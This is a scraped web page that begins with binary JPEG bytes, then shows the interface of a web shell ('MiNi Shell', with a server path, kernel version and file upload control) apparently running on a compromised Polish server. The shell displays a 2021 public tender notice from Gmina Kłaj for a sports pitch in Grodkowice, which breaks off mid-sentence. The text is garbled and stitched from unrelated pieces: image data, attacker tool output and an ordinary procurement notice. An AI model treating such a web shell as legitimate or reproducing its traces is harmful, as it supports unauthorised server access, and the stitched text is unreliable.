JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210727/0012838001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00128380 z dnia 2021-07-27</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa boiska wielofunkcyjnego o nawierzchni poliuretanowej w miejscowości Grodkowice, Gmina Kłaj </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KŁAJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351555980</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">655</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kłaj</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-015</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">122841108</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ugk@klaj.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.klaj.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa boiska wielofunkcyjnego o nawierzchni poliuretanowej w miejscowości Grodkowice, Gmina Kłaj </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-527a94d4-eed2-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00128380</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00018306/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Budowa boiska wielofunkcyjnego o nawierzchni poliuretanowej w miejscowości Grodkowice, Gmina Kłaj</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.malopolska.pl/ugklaj,m,365952,2021.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu • portalu<br/>ePUAP: /k0wsvf0513/SkrytkaESP• poczty elektronicznej pod adresem: ugk@klaj.pl • portalu<br/>https://miniportal.uzp.gov.pl/ Adres strony postępowania:<br/>https://bip.malopolska.pl/ugklaj,m,365952,2021.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">2)<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na portalu ePUAP.<br/>3) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP.<br/>4) Maksymalny rozmiar plików przesyłanych za pośrednictwem formularzy do: złożenia, zmiany,<br/>wycofania oferty lub wniosku oraz do komunikacji wynosi 150MB.<br/>5) Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP.<br/>6) W niniejszym postępowaniu o udzielenie zamówienia oświadczenia, wnioski, zawiadomienia oraz<br/>informacje Zamawiający i Wykonawcy przekazują, zgodnie z wyborem Zamawiającego drogą<br/>elektroniczną z dopiskiem: „Postępowanie nr In.271.13.2021”</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Wykonawca zobowiązany jest zapoznać się z<br/>Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w<br/>sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (dalej także „RODO”) i ustawą z dnia 10 maja 2018 r. o ochronie danych osobowych<br/>(Dz.U. z 2018 r., poz. 1000) (dalej także „Ustawa z dnia 10.05.2018 r.”) i przestrzegać regulacji tam<br/>zawartych.<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i<br/>w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję,<br/>że:<br/>• administratorem Pani/Pana danych osobowych jest Gmina Kłaj ; 32-015 Kłaj 655;<br/>• inspektorem ochrony danych osobowych w Gminie Kłaj jest osoba powołana przez Wójta Gminy Kłaj<br/>kontakt: iod@klaj.pl, tel. 12-284-11-00;<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z postępowaniem o udzielenie zamówienia publicznego In.271.10.2021 Budowa boiska<br/>wielofunkcyjnego o nawierzchni poliuretanowej w miejscowości Grodkowice, Gmina Kłaj prowadzonym<br/>w trybie podstawowym.<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 ust. 1 oraz art. 74 ust. 1 ustawy z dnia 11 września<br/>2019 r. – Prawo zamówień publicznych (t. j. Dz. U. z 2021 r. poz. 1129), dalej „ustawa Pzp”;<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>• posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>• nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">In.271.13.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem inwestycji jest budowa boiska wielofunkcyjnego o nawierzchni poliuretanowej w<br/>miejscu istniejącego boiska o nawierzchni asfaltowej, zlokalizowanego na działce nr 4 w<br/>miejscowości Grodkowice. Inwestycja przewiduje:<br/>• budowę boiska wielofunkcyjnego w miejscu boiska asfaltowego<br/>• montaż piłkochwytów<br/>• remont ogrodzenia<br/>Szczegółowy opis przedmiotu zamówienia stanowi Dokumentacja projektowa i Przedmiar robót (załącznik nr 9 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Cena brutto<br/>Maksymalnie w tym kryterium można uzyskać 90 punktów. Punkty za powyższe kryterium będą liczone<br/>według następującego wzoru:<br/>najniższa oferowana cena brutto<br/>Wartość punktowa = ----------------------------------------------------------- x 100 x 90 % cena brutto badanej oferty<br/>2) Okres gwarancji<br/>Maksymalnie w tym kryterium można uzyskać 10 punktów. Punkty za powyższe kryterium będą liczone<br/>według następującego wzoru:<br/>okres gwarancji (w miesiącach) w ofercie badanej<br/>Wartość punktowa = -------------------------------------------------------------------- x 100 x 10 %<br/>okres gwarancji (w miesiącach) najdłuższy spośród ofert<br/>Uwaga:<br/>a) Zamawiający określa minimalny okres gwarancji na 36 miesięcy, natomiast maksymalny na 60<br/>miesiące.<br/>b) Zaoferowanie gwarancji równej wymaganemu minimum (36 miesięcy) spowoduje nieprzyznanie<br/>żadnego punktu w tym kryterium.<br/>c) Zaoferowanie gwarancji poniżej wymaganego minimum spowoduje odrzucenie oferty zgodnie z art.<br/>226 ust. 1 pkt 5 ustawy Pzp.<br/>d) Nie wpisanie okresu gwarancji w formularzu ofertowym spowoduje odrzucenie oferty zgodnie z art.<br/>226 ust. 1 pkt 5 ustawy Pzp.<br/>e) W przypadku gdy wykonawca zaoferuje okres gwarancji powyżej wymaganego maksimum,<br/>zamawiający do oceny ofert przyjmie 60 miesięcy.<br/>f) Wykonawca winien podać ilość miesięcy wyrażoną w liczbach całkowitych. W innym przypadku okres<br/>gwarancji zostanie przeliczony do pełnych miesięcy i wynik zostanie zaokrąglony w dół.<br/>Ocena końcowa oferty to suma punktów uzyskanych przez ofertę w poszczególnych kryteriach. Za<br/>najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą łączną liczbę punktów. Wszystkie<br/>obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku. Wykonawca może uzyskać maksymalnie 100 pkt.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia<br/>taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert<br/>ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę<br/>z najniższą ceną lub najniższym kosztem.<br/>Jeżeli nie można dokonać wyboru oferty w powyższy sposób zamawiający wzywa wykonawców, którzy<br/>złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych<br/>zawierających nową cenę lub koszt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający określa następujące warunki udziału w postepowaniu:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa w tym zakresie warunku udziału w postępowaniu.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>Zamawiający nie określa w tym zakresie warunku udziału w postępowaniu.<br/>3) sytuacji finansowej lub ekonomicznej:<br/>Wykonawca spełni warunek jeśli wykaże, że:<br/>Jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej<br/>z przedmiotem zamówienia na kwotę co najmniej 500 000 zł (słownie: pięćset tysięcy złotych<br/>00/100).<br/>Wartości podane w dokumentach potwierdzających spełnienie warunku w walutach innych niż<br/>PLN, Wykonawca przeliczy wg średniego kursu NBP (Tabela A), na dzień wystawienia<br/>dokumentu.<br/>4) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek jeśli wykaże, że:<br/>a) wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwa zadania, obejmujące<br/>swym zakresem roboty budowlane, polegające na budowie lub przebudowie obiektu<br/>budowlanego o nawierzchni poliuretanowej, której powierzchnia wynosi minimum 1000,00 m2<br/>PLN.<br/>b) skieruje do realizacji zamówienia:<br/>• przynajmniej jedną osobę posiadającą uprawnienia budowlane do kierowania robotami<br/>budowlanymi w specjalności konstrukcyjno-budowlanej,<br/>W pozostałym zakresie Wykonawca, w czasie realizacji zamówienia, zapewni adekwatny do<br/>przedmiotu zamówienia nadzór branżowy wynikający z uprawnień budowlanych w<br/>poszczególnych specjalnościach, o których mowa w ustawie Prawo budowlane.<br/>W przypadku posiadania przez jedną osobę wymaganych uprawnień więcej niż jednej<br/>specjalności, Zamawiający dopuszcza łączenie stanowisk.<br/>Uprawnienia osób, o których mowa w rozdz. V pkt 2.3) b) SWZ muszą być zgodne z ustawą z<br/>dnia 7 lipca 1994 r. – Prawo budowlane (Dz. U. 2020 poz. 1333) oraz Rozporządzeniem Ministra<br/>Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do<br/>wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. 2019 poz. 831).<br/>Zamawiający, określając wymogi dla osób w zakresie posiadanych uprawnień, dopuszcza<br/>odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw<br/>Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art.<br/>12a oraz innych przepisów ustawy Prawo budowlane (Dz.U. 2020 poz. 1333) oraz ustawy o<br/>zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej z dnia 22 grudnia 2015 r. (Dz.U. z 2020 r. poz. 220).<br/>Oceniając zdolność techniczną lub zawodową, zamawiający może, na każdym etapie<br/>postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie<br/>przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów<br/>technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy<br/>może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) Informacji z Krajowego Rejestru Karnego – w zakresie:<br/>• art. 108 ust. 1 pkt 1 i 2 ustawy Pzp<br/>• art. 108 ust. 1 pkt 4 ustawy, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne<br/>tytułem środka karnego<br/>sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem<br/>b) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę,<br/>albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do<br/>tej samej grupy kapitałowej (załącznik nr 5 do SWZ)<br/>c) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) dokumentów potwierdzających, że wykonawca jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia<br/>na sumę gwarancyjną określoną przez zamawiającego<br/>b) wykazu robót (załącznik nr 6 do SWZ) wykonanych nie wcześniej, niż w okresie ostatnich 5 lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których<br/>roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane<br/>zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje, bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonywane, a<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty.<br/>c) wykazu osób (załącznik nr 7 do SWZ) skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich uprawnień i doświadczenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 2) Pełnomocnictwo – jeżeli wykonawca składa ofertę przez ustanowionego pełnomocnika lub w<br/>przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji zamówienia (załącznik nr 3 do SWZ) – jeżeli wykonawca polega<br/>na zdolnościach technicznych lub zawodowych lub sytuacji ekonomicznej lub finansowej innych<br/>podmiotów.<br/>4) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia - z którego<br/>wynika, które roboty budowlane wykonają poszczególni wykonawcy (załącznik nr 4 do SWZ) –<br/>jeżeli zachodzi sytuacja opisana w rozdz. V pkt 3 SWZ<br/>3) Dokumenty podmiotów zagranicznych:<br/>Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej<br/>Polskiej, zamiast:<br/>a) informacji z Krajowego Rejestru 